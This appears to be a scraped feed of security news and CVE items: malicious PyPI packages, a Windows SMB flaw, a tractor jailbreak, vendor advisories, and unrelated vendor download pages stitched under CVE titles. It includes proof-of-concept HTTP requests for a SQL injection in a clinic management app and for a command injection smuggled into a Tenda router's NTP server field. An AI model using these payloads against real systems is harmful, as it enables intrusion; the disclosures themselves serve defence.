Just as one crop of malware-laced software packages is taken down from the popular Python code repository, a new host arrives, looking to steal a raft of data.

Just a week after 10 malicious software packages were found nesting in the Python Package Index (PyPI) repository, several more have come to light, uncovered by different firms. It's becoming a bit of a whack-a-mole exercise, snuffing out bad code only to find more taking its place.

In last week's disclosure, researchers at Check Point found Trojanized packages mimicking popular legitimate components, containing droppers for information-stealing malware. That prompted Kaspersky analysts to scour the open source repository further, which led to the discovery of two more rogue offerings, dubbed "pyrequests" and "ultrarequests," that purported to be one of the most popular packages in PyPI (which is simply named “requests“).

"The attacker used a description of the legitimate 'requests' package in order to trick victims into installing a malicious one," according to Kaspersky's Tuesday analysis. "The description contains faked statistics, as if the package was installed 230 million times in a month and has more than 48,000 stars on GitHub. The project description also references the web pages of the original requests package, as well as the author’s email. All mentions of the legitimate package's name have been replaced with the name of the malicious one."

If installed, the result is a W4SP Stealer infection, through which attackers can steal Discord tokens, saved cookies, and passwords from browsers in separate threads.

Meanwhile, researchers at Synk on Tuesday published findings around a dozen malicious PyPI packages aimed at stealing Discord and Roblox users’ credentials and payment info. According to Kyle Suero, Snyk's lead researcher on the report, the malware will also attempt to steal Google Chrome data or pilfer passwords and bookmarks from Windows machines to pivot throughout all accounts.

All of the offending packages have been removed from PyPI; however, it's unclear how many times they were downloaded before that.

Attacks on code repositories continue to snowball. According to ReversingLabs, attacks on npm and PyPI have collectively spiked from 259 in 2018 to 1,010 in 2021 — a 290% increase.

"As long as we keep ignoring the core of the problem — which is how do you trust code — we are not handling software supply chain security," said Tomislav Peričin, co-founder and chief software architect at ReversingLabs, said in a recent report.

Whack-a-Mole: More Malicious PyPI Packages Spring Up Targeting Discord, Roblox

Clinic's Patient Management System v1.0 is vulnerable to SQL Injection via /pms/update_medicine.php?id=.

Permalink

**Clinic's Patient Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author：JinLongZhou

vendors: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

Vulnerability File: /pms/update\_medicine.php?id=

Vulnerability location: /pms/update\_medicine.php?id=, id

dbname = pms\_db

\[+\] Payload: /pms/update\_medicine.php?id=-2%20union%20select%201,database()--+ // Leak place ---> id

GET /pms/update\_medicine.php?id\=\-2%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=odknb2obdq1nkaqk7p7u8hvli8
Connection: close

CVE-2022-36242: bug_report/SQLi-1.md at main · MouZhou/bug_report

The security flaw tracked as CVE-2022-30216 could allow attackers to perform server spoofing or trigger authentication coercion on the victim.

Researchers have discovered a vulnerability in the remote procedure calls (RPC) for the Windows Server service, which could allow an attacker to gain control over the domain controller (DC) in a specific network configuration and execute remote code.

Malicious actors could also exploit the vulnerability to modify a server's certificate mapping to perform server spoofing.

Vulnerability CVE-2022-30216, which exists in unpatched Windows 11 and Windows Server 2022 machines, was addressed in July's Patch Tuesday, but a report from Akamai researcher Ben Barnes, who discovered the vulnerability, offers technical details on the bug.

The full attack flow provides full control over the DC, its services, and data.

**Proof of Concept Exploit for Remote Code Execution**

The vulnerability was found in SMB over QUIC, a transport-layer network protocol, which enables communication with the server. It allows connections to network resources such as files, shares, and printers. Credentials are also exposed based on belief that the receiving system can be trusted.

The bug could allow a malicious actor authenticated as a domain user to replace files on the SMB server and serve them to connecting clients, according to Akamai. In a proof of concept, researchers exploited the bug to steal credentials via authentication coercion.

Specifically, they set up an NTLM relay attack. Now deprecated, NTLM uses a weak authentication protocol that can easily reveal credentials and session keys. In a relay attack, bad actors can capture an authentication and relay it to another server — which they can then use to authenticate to the remote server with the compromised user's privileges, providing the ability to move laterally and escalate privileges within an Active Directory domain.

"The direction we chose was to take advantage of the authentication coercion," Akamai security researchers Ophir Harpaz says. "The specific NTLM relay attack we chose involves relaying the credentials to the Active Directory CS service, which is responsible for managing certificates in the network."

Once the vulnerable function is called, the victim immediately sends back network credentials to an attacker-controlled machine. From there, attackers can gain full remote code execution (RCE) on the victim machine, establishing a launching pad for several other forms of attack including ransomware, data exfiltration, and others.

"We chose to attack the Active Directory domain controller, such that the RCE will be most impactful," Harpaz adds.

Akamai's Ben Barnea points out with this case, and since the vulnerable service is a core service on every Windows machine, the ideal recommendation is to patch the vulnerable system.

"Disabling the service is not a feasible workaround," he says.

**Server Spoofing Leads to Credential Theft**

Bud Broomhead, CEO at Viakoo, says in terms of negative impact to organizations, server spoofing is also possible with this bug.

"Server-spoofing adds additional threats to the organization, including man-in-the-middle attacks, data exfiltration, data tampering, remote code execution, and other exploits," he adds.

A common example of this can be seen with Internet of Things (IoT) devices tied to Windows application servers; e.g., IP cameras all connected to a Windows server hosting the video management application.

"Often IoT devices are set up using the same passwords; gain access to one, you've gained access to them all," he says. "Spoofing of that server can enable data integrity threats, including planting of deepfakes."

Broomhead adds that at a basic level, these exploitation paths are examples of breaching internal system trust — especially in the case of authentication coercion.

**Distributed Workforce Broadens Attack Surface**

Mike Parkin, senior technical engineer at Vulcan Cyber, says while it doesn't appear that this issue has yet been leveraged in the wild, a threat actor successfully spoofing a legitimate and trusted server, or forcing authentication to an untrusted one, could cause a host of problems.

"There are a lot of functions that are based on the 'trust' relationship between server and client and spoofing that would let an attacker leverage any of those relationships," he notes.

Parkin adds a distributed workforce broadens the threat surface considerably, which makes it more challenging to properly control access to protocols that shouldn't be seen outside the organization's local environment.

Broomhead points out rather than the attack surface being contained neatly in data centers, distributed workforces have also expanded the attack surface physically and logically.

"Gaining a foothold within the network is easier with this expanded attack surface, harder to eliminate, and provides potential for spillover into the home or personal networks of employees," he says.

From his perspective, maintaining zero trust or least privileged philosophies reduces the dependence on credentials and the impact of credentials being stolen.

Parkin adds that reducing the risk from attacks like this requires minimizing the threat surface, proper internal access controls, and keeping up to date on patches throughout the environment.

"None of them are a perfect defense, but they do serve to reduce the risk," he says.

Windows Vulnerability Could Crack DC Server Credentials Open

upsMonitor in ViewPower (aka ViewPowerHTML) 1.04-21012 through 1.04-21353 has insecure permissions for the service binary that enable an Authenticated User to modify files, allowing for privilege escalation.

 ViewPower Management Software 

**ViewPowerHTML 1.04-21353** is an advanced UPS management software. It allows remote monitor and manage from one to multiple UPSs in a networked environment, either LAN or INTERNET. It can not only prevent data loss from power outage and safely shutdown systems, but also store programming data and scheduled shutdown UPSs.  

  

**Feature summary:**  
• Allows control and monitoring of multiple UPSs via LAN and INTERNET  
• Supports auto and manual online upgrade  
• User-friendly power analysis graph: event statistics, history data chart export  
• Real-time dynamic graphs of UPS data (voltage, frequency, load level, battery level)  
• Safely OS shutdown and protection from data loss during power failure  
• Warning notifications via audible alarm, broadcast, mobile messenger, and e-mail  
• Scheduled UPS on/off, battery test, programmable outlet control, and audible alarm control  
• Password security protection and remote access management  
• Supports multiple languages: English, Chinese, French, German, Spanish, Russian, Portuguese, Ukrainian, Italian, Polish, Czech, Turkish   Download the software according to your requested operation system in your computer system. Supported browser versions include IE browser (not support the version older than IE10), Google, Chrome, Firefox,. All browers should support html5.

Software Version

Type

Download Link

Supported OS

ViewPower Network Edition  

Software for Windows® (V.HTML 1.04-21353)

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / Windows SBS 2011

Windows XP 2003 /2008

Windows® Server 2019 (32-bit & x64-bit)

User Manual

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / 2019 (32-bit & x64-bit) Windows SBS 2011

Software for MAC x86-64 (V.HTML 1.04-21353) Intel Chip

Mac OS 10.6/10.7/10.8/10.9/10.10/10.11/10.12/10.13/10.14/10.15 /11.x (intel x64-bit)

Software for MAC x86-64 (V.HTML 1.04-21353) M1 Chip

Mac OS 11.x (M1)

Software for Linux  
(V.HTML 1.04-21353)

Graphic mode operation:

Linux Cent OS 5/ 6 / 7 (32-bit )  
Linux Debian 6.x/8.x/10.x (32bit)  
Linux Fedora 5/ 17 (32bit)  
Linux Mint 14.x/19.x (32bit)  
Linux OpenSUSE 10/ 11 / 12/ 13 (32bit)  
Linux RedHat Enterprise AS3, AS5 AS6 (32bit)  
Linux RedHat Enterprise 5/8/9 (32-bit)  
Linux Ubuntu 8/ 9/ 10/ 12/ 14/ 15/ 16 (32-bit )  

Text mode operation:

Graphic mode operation:

Linux CentOS 5/ 6/ 7/ 8 (64bit)  
Linux Debian 6/ 7/ 8/ 10 (64bit)  
Linux Fedora 5/ 17/ 33 (64-bit)  
Linux Mint 19/ 20 (64bit)  
Linux OpenSUSE 10/ 11/ 12/ 13 (64bit)  
Linux RedHat Enterprise AS6 (64bit)  
Linux SUSE 10/ 11/ 12 (64bit)  
Linux Ubuntu 10/ 11/ 12/ 14/ 15/ 16/ 18/ 19/ 20 (64bit)  

Text mode operation:

ESXI Shutdown Wizard

User Manual

ESXI 4.x/ 5.x/6.x

CVE-2021-30490: Software download for Uninterruptible Power Supply

Tenda AC9 V15.03.2.21_cn is vulnerable to command injection via goform/SetSysTimeCfg.

The parameter Ntpserver is passed to tip\_sntp\_handle->doSystemCmd. A command injection vulnerability was formed.

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 76
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9150451753353981&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=25f9e794323b453885f5181f1b624d0btjotgb
    Connection: close
    
    timePeriod=86400&ntpServer="time.windows.com| ls > /tmp/f0und"&timeZone=20%3A00

CVE-2022-36273: CVEIDs/TendaAC9 at main · F0und-icu/CVEIDs

The image file management page of SolarView Compact SV-CPT-MC310 Ver.7.23 and earlier, and SV-CPT-MC310F Ver.7.23 and earlier contains an insufficient verification vulnerability when uploading files. If this vulnerability is exploited, arbitrary PHP code may be executed if a remote authenticated attacker uploads a specially crafted PHP file.

**SV-CPT-MC310****マニュアル**

   

データ

容量

更新日

掲載日

解説書 | SV-CPT-MC310 Series \[日本語\]

1197 KB

2021.10.11

2017.01.12

SolarView Compact / Airソフトウェアマニュアル(PDF版) Ver.6.00以降

9801 KB

2022.05.25

2019.01.10

SolarView Compact ソフトウェアマニュアル(PDF版) Ver.4.00以降

7323 KB

2020.04.29

2016.11.18

SolarView Compact ソフトウェアマニュアル(PDF版) Ver.3.20以前

5693 KB

2018.09.25

2015.04.03

**テクニカルガイド**

   

データ

容量

更新日

掲載日

かんたんセットアップガイド | SV-CPT-MC310 \[日本語\]

4258 KB

2022.02.15

2015.07.07

SolarView シリーズ パソコン設定方法 Windows 11 (PDF版)

1427 KB

2022.02.15

2022.02.15

SolarView シリーズ パソコン設定方法 Windows 10 (PDF版)

989 KB

2022.02.15

2016.02.24

SolarView シリーズ パソコン設定方法 Windows 8 (PDF版)

730 KB

2014.11.07

2014.11.07

SolarView シリーズ パソコン設定方法 Windows 7 (PDF版)

1824 KB

2014.11.07

2014.11.07

SolarViewシリーズ ファームウェア アップデート手順書(PDF版)

1261 KB

2021.02.16

2018.08.31

**その他ドキュメント**

   

データ

容量

更新日

掲載日

パワコン対応リスト | SolarView Compact/Air

408 KB

2022.08.08

2016.11.18

動作検証済USBメモリリスト | SolarView Compact/Air

297 KB

2021.12.24

2021.12.24

SolarView オプションキット(PDF版)

502 KB

2016.12.16

2012.10.02

SolarView シリーズ　ケーブル製作時・配線時の注意(PDF版)

224 KB

2014.12.24

2014.12.24

**デバイスドライバ**

   

データ

容量

更新日

掲載日

SolarView Compact/Battery　メール暗号化対応パッチ

793 KB

2020.03.06

2019.09.10

**開発支援ツール**

   

データ

容量

更新日

掲載日

**追加サンプルプログラム**

   

データ

容量

更新日

掲載日

**アプリケーション**

   

データ

容量

更新日

掲載日

**ファームウェア**

   

データ

容量

更新日

掲載日

SolarView Compact ファームウェア アップデータ Ver.7.24

724 KB

2022.07.21

2022.03.23

SolarView Compact ファームウェア アップデータ Ver.7.00

2082 KB

2021.11.10

2021.02.16

SolarView Compact ファームウェア アップデータ Ver.6.00

1868 KB

2019.01.10

2019.01.10

SolarView Compact ファームウェア アップデータ Ver.5.00

1748 KB

2017.07.24

2017.07.24

SolarView Compact ファームウェア アップデータ Ver.4.00

612 KB

2016.10.25

2016.10.25

SolarView Compact ファームウェア アップデータ Ver.3.00

8384 KB

2015.07.31

2015.07.31

**ユーティリティ**

   

データ

容量

更新日

掲載日

**CAD**

   

データ

容量

更新日

掲載日

SV-CPT-MC310 CADデータ

49 KB

2012.03.16

2012.03.16

**カタログ**

   

データ

容量

更新日

掲載日

リーフレット | SolarView Compact SV-CPT-MC310 \[日本語\]

914 KB

2022.06.23

2020.09.15

製品紹介資料 | SolarView Compact \[日本語\]

4996 KB

2022.08.09

2019.02.14

SolarView Compact 接続イメージ図

1912 KB

2019.02.14

2019.02.14

CVE-2022-35239: ダウンロード | コンテック

An unquoted search path vulnerability exists in 'JustSystems JUST Online Update for J-License' bundled with multiple products for corporate users as in Ichitaro through Pro5 and others. Since the affected product starts another program with an unquoted file path, a malicious file may be executed with the privilege of the Windows service if it is placed in a certain path. Affected products are bundled with the following product series: Office and Office Integrated Software, ATOK, Hanako, JUST PDF, Shuriken, Homepage Builder, JUST School, JUST Smile Class, JUST Smile, JUST Frontier, JUST Jump, and Tri-De DetaProtect.

Published:2022/07/28  Last Updated:2022/07/28

**Overview**

"JustSystems JUST Online Update for J-License" bundled with multiple JustSystems products for corporate users starts another program with an unquoted file path.

**Products Affected**

"JustSystems JUST Online Update for J-License" (for corporate users) is affected.  
For more information, refer to the information provided by the developer.

**Description**

"JustSystems JUST Online Update for J-License" is bundled with multiple products for corporate users provided by JustSystems Corporation, as in Ichitaro through Pro5 and others, and it is registered as a Windows service.  
"JustSystems JUST Online Update for J-License" starts another program with an unquoted file path (CWE-428).

**Impact**

A malicious file may be executed with the privilege of the Windows service.

**Solution**

**Update the software**  
Update the software to the latest version according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:L/AC:L/Au:S/C:C/I:C/A:C

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Comment**

The analysis assumes that Windows filesystem ACLs are configured in a certain way where a non-administrative user can abuse the issue.

**Credit**

Hiroki MATSUKUMA of Cyber Defense Institute, Inc. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2022-36344: "JustSystems JUST Online Update for J-License" starts a program with an unquoted file path

By Waqas
The hacker “Sick Codes” managed to jailbreak the display/control unit of one of the John Deere Tractor models…
This is a post from HackRead.com Read the original post: White Hat Hacker at DefCon Jaikbreaks Tractor to Play Doom

****The hacker “Sick Codes” managed to jailbreak the display/control unit of one of the John Deere Tractor models during DefCon hacking conference.****

On August 14th, 2022 at the **DEFCON** hacking conference, a white hat hacker and infosec researcher going by the online handle of “Sick Codes” demonstrated how the display/control unit of John Deere Tractor can be compromised to take control of a targeted tractor model.

In the researcher’s case, they shared a live video of the popular Doom game being played on the Tractor’s display screen.

“I launched the attack and two minutes later a terminal pops up,” **Sick Codes** said. “I had root access, which is rare in Deere land.”

Sick Codes on Twitter

It is worth noting that the process requires physical access to the tractor’s circuit board to execute the attack. However, according to the researcher, based on the existing vulnerabilities, it would be possible to develop a tool “to easily execute the jailbreak.”

Since the release of the video, the cyber security community is expressing grave concerns about the possibility of exploitation and possible cyber attacks against farm equipment manufacturer John Deere giant and its customers.

> On Saturday, I sat in a crowded ballroom at Caesar's Forum in Vegas and watched @sickcodes jailbreak a John Deere tractor's control unit live, before an audience of cheering @Defcon 30 attendees (and, possibly, a few undercover Deere execs, who often attend Sickcodes's talks). 1/ pic.twitter.com/WHuMCFQLZy
> 
> — Cory Doctorow (@doctorow) August 15, 2022

On Twitter, the co-founder, and CEO of the online repair community iFixit and “Right to repair” advocate Kyle Wiens said that “This is just the beginning. Turns out our entire food system is built on outdated, unpatched Linux and Windows CE hardware with LTE modems.”

> Sick Codes has jailbroken a John Deere, and this is just the beginning. Turns out our entire food system is built on outdated, unpatched Linux and Windows CE hardware with LTE modems. pic.twitter.com/OLDBckluxr
> 
> — Kyle Wiens (@kwiens) August 14, 2022

Wiens **went on** to raise his voice in favor of the ongoing right-to-repair movement stating that “John Deere has repeatedly told regulators that farmers can’t be trusted to repair their own equipment. This foundational work will pave the path for farmers to retake control of the equipment that they own.”

As for Sick Codes’ stance on the right to repair; the hacker **told** Wired that,

> We want farmers to be able to repair their stuff for when things go wrong, and now that means being able to repair or make decisions about the software in their tractors.”
> 
> Sick Codes

**What is right to repair movement?**

For your information, the **right to repair** is a movement that is gaining traction in the United States. The aim of the right to repair movement is to give consumers the ability to repair their own electronic devices, rather than being forced to go through the manufacturer.

As farmers and ranchers across the United States face mounting pressure to adopt new technology, they are also grappling with another issue: whether they will have the right to repair their own equipment.

At the heart of the debate is John Deere, one of the largest manufacturers of agricultural equipment in the world. The company has been outspoken in its opposition to the “right to repair” legislation, which would give farmers and other owners of Deere equipment the ability to fix it themselves or take it to an independent repair shop.

Deere argues that such legislation would jeopardize its intellectual property and put customers at risk. The company has also said that it already offers a wide range of services and support for farmers who need to repair their equipment.

**Solution**

According to Sick Codes, it will be important to see what Deere may do to patch the vulnerabilities. The researcher added that it might be possible that the issue can be resolved with full disk encryption which sounds like an impossible task with tractors that are already in use. Nevertheless, if taken seriously, Deere can sort things out in its upcoming tractor models.

**Sick Codes with his “Sick” Hacks!**

This is not the first time when Sick Codes has come up with a hack that has made headlines worldwide. In 2021, the hacker demonstrated how malicious elements can exploit a plethora of vulnerabilities in tractors to overspray farms in the United States.

Sick Codes on YouTube in 2021

1.  **Nintendo Switch Hacked to Run Pirated Games**
2.  **Self-driving cars can be fooled by displaying virtual objects**
3.  **Wikileaks Vault 7: CIA hacked Smart TVs, Trucks, and Computers**
4.  **Tesla cars and smart devices can be unlocked due to Bluetooth Flaws**
5.  **Hackers Exploit Tegra Chipset Flaw to Run Linux OS on Nintendo Switch**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

White Hat Hacker at DefCon Jaikbreaks Tractor to Play Doom

An issue was discovered in Aviatrix Gateway before 6.6.5712 and 6.7.x before 6.7.1376. Because Gateway API functions mishandle authentication, an authenticated VPN user can inject arbitrary commands.

Aviatrix Product Security Team continually tests the software product, looking for vulnerabilities and weaknesses. If you have a security issue to report, please open a support ticket at Aviatrix Support Portal at https://support.aviatrix.com. Any such findings are fed back to Aviatrix’s development teams and serious issues are described along with protective solutions in the advisories below.

Please note the below Aviatrix Security recommendations and communication plans: - Aviatrix strongly recommend customers to stay on the latest release to resolve features and bug issues. All fixes are in the new release; we do not patch older release versions. - Customers are strongly recommended to perform image migration 2x a year. The migration process provides the latest system level security patch - All known software vulerabilities are submitted to Mitre for CVE-ID references by Aviatrix Systems - Avitrix publish Field Notices and send alerts to Controller Admin in the Controller console when security related issues are published

**23\. Aviatrix Controller and Gateways - Unauthorized Access¶**

**Date** 08/02/2022

**Risk Rating** High for Gateways.

**Description** Gateway APIs contain functions that are inappropriately authenticated and would allow an authenticated VPN user to inject arbitrary commands.

**Impact** A successful attack would allow an authenticated VPN user to execute arbitrary comments against Aviatrix gateways.

**Affected Products** Aviatrix Gateways

**Solution** Upgrade your Aviatrix Controller and gateway software to:

*   6.6.5712 or later
*   6.7.1376 or later

**Acknowledgement** Aviatrix would like to thank Thomas Wallin from Splunk for the responsible disclosure of this issue.

**22\. Remote Code Execution¶**

**Date** 05/27/2022

**Risk Rating** AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (10.0)

**Description** Several vulnerabilities could be combined by an attacker to abuse a Gateway command mechanism that would allow arbitrary remote code execution. This vulnerability is not known to be exploited.

**Impact** An unauthenticated attacker to run arbitrary commands against Aviatrix gateways.

**Affected Products** Aviatrix Controller and Gateways.

**Solution: Upgrade your controller and gateway software to:**

*   6.4.3057
*   6.5.3233
*   6.6.5612
*   6.7.1185

**21\. Post-Auth Remote Code Execution¶**

**Date** 04/11/2022

**Risk Rating** High

**Description** TLDAP APIs contain functions that are inappropriately sanitized, and would allow an authenticated malicious user to inject arbitrary commands.

**Impact** A local user to the controller UI could execute arbitrary code.

**Affected Products** Aviatrix Controller.

**Solution: Upgrade your controller and gateway software to:**

*   6.4.3049
*   6.5.3166
*   6.6.5545

**20\. Aviatrix Controller and Gateways - Privilege Escalation¶**

**Date** 02/03/2022

**Risk Rating** Medium

**Description** The publicly disclosed CVE-2021-4034 and CVE-2022-0185 are local privilege escalation vulnerabilities disclosed in the past two weeks. When successfully executed, an attack exploiting these vulnerabilities can cause a local privilege escalation giving unprivileged users administrative rights on the target machine. The Aviatrix Gateway, Controller, and Copilot are all running vulnerable versions of the Linux packages. However, in order to successfully exploit these vulnerabilities, an attacker requires local access to our systems and no vulnerability known to us today would allow such attack.

**Impact** A local user to our appliances can escalate his privileges to root.

**Affected Products** Aviatrix Controller and Gateways.

**Solution**

*   Upgrade Copilot to Release 1.6.3.
*   Apply security patch \[AVI-2022-0001 - CVE-2021-4034 and CVE-2022-0185 Privilege Escalation Patches\] to controllers.

**19\. Aviatrix Controller and Gateways - Unauthorized Access¶**

**Date** 01/11/2022

**Risk Rating** High for Gateways, medium for Controller.

**Description** On the Aviatrix Controller, a successful attack would allow an unauthenticated remote attacker partial access to configuration information and allow them to disrupt the service. On the gateway, a successful attack would allow an unauthenticated network-adjacent attacker (i.e.: an attacker present on the gateway’s VPC) access to its API.

**Impact** Access to configuration information and disruption of service.

**Affected Products** Aviatrix Controller, Gateways and Copilot.

**Solution** Upgrade your controller and gateway software to:

*   6.4.2995 or later.
*   6.5.2898 or later.

**18\. Aviatrix Controller - Remote file execution¶**

**Date** 10/04/2021

**Risk Rating** Critical

**Description** The Aviatrix Controller legacy API had a vulnerability allowing an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.

**Impact** Remote file execution

**Affected Product** Aviatrix Controller prior to the fixed versions.

**Solution** The vulnerability has been fixed in:

> *   UserConnect-6.2-1804.2043 or later
> *   UserConnect-6.3-1804.2490 or later
> *   UserConnect-6.4-1804.2838 or later
> *   UserConnect-6.5-1804.1922 or later

**CVE-ID** CVE-2021-40870

**Acknowledgement** Aviatrix would like to thank the team at Tradecraft (https://www.wearetradecraft.com/) for the responsible disclosure of these issues.

**17\. OpenVPN - Abitrary File Write¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** The VPN service write logs to a location that is writable

**Impact** Unauthorized file permission

**Affected Product** Aviatrix OpenVPN R2.8.2 or earlier

**Solution** Aviatrix OpenVPN OpenVPN 2.10.8 - May 14 2020 or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**16\. Bypass htaccess security control¶**

**Date** 8/10/2020

**Risk Rating** Low

**Description** The htaccess control to prevent requests to a cert directory can be bypassed to download files.

**Impact** Excessive Permission

**Affected Product** Controller 5.3.1516

**Solution** Controller R5.4.1290 (8/5/2020) or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**15\. Insecure File Permissions¶**

**Date** 8/10/2020

**Risk Rating** Medium

**Description** Several world writable files and directories were found

**Impact** Excessive Permission

**Affected Product** Controller 5.3.1516

**Solution** Controller R5.4.1290 (8/5/2020) or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**14\. Bypass Htaccess Security Control¶**

**Date** 8/10/2020

**Risk Rating** Low

**Description** The htaccess control to prevent requests to directories can be bypassed for file downloading.

**Impact** Unauthorized file download

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26549

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**13\. Insecure sudo rule¶**

**Date** 8/10/2020

**Risk Rating** Medium

**Description** A user account has permission to execute all commands access as any user on the system.

**Impact** Excessive permission

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26548

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**12\. Cleartext Ecryption Key Storage¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** Encrypted key values are stored in cleartext in a readable file

**Impact** Access to read key in encrypted format

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.3.1151 (6/4/2020) or later Migration required to the latest AMI Software Version 050120 (Aug 13, 2020)

**CVE-ID** CVE-2020-26551

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**11\. Pre-Auth Account Takeover¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An API file does not require a valid session and allows for updates of account email addresses.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26552

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**10\. Post-Auth Remote Code Execution¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** Several APIs contain functions that allow arbitrary files to be uploaded to the web tree.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R6.0.2483 (8/4/2020) or later

**CVE-ID** CVE-2020-26553

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**9\. Pre-Auth Remote Code Execution¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An API file does not require a valid session ID and allows arbitrary files to be uploaded to the web tree.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R6.0.2483 (8/4/2020) or later

**CVE-ID** CVE-2020-26553

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**8\. Insufficiently Protected Credentials¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An encrypted file containing credentials to unrelated systems is protected by a weak key.

**Impact** Encryption key may not meet the latest security standard

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.3.1151 (6/4/2020) or later

**CVE-ID** CVE-2020-26550

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**7\. Observable Response Discrepancy from API¶**

**Date** 5/19/2020

**Risk Rating** Medium

**Description** The Aviatrix Cloud Controller appliance is vulnerable to a user enumeration vulnerability.

**Impact** A valid username could be used for brute force attack.

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later

**CVE-ID** CVE-2020-13413

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**6\. OpenVPN Client - Elevation of Privilege¶**

**Date** 5/19/2020

**Risk Rating** High

**Description** The Aviatrix VPN client on Linux, macOS, and Windows is vulnerable to an Elevation of Privilege vulnerability. This vulnerability was previously reported (CVE-2020-7224), and a patch was released however the fix is incomplete.

**Impact** This would impact dangerous OpenSSL parameters code execution that are not authorized. Impacts macOS, Linux and Windows clients.

**Affected Product** Client VPN 2.8.2 or earlier Controller & Gateway 5.2 or earlier

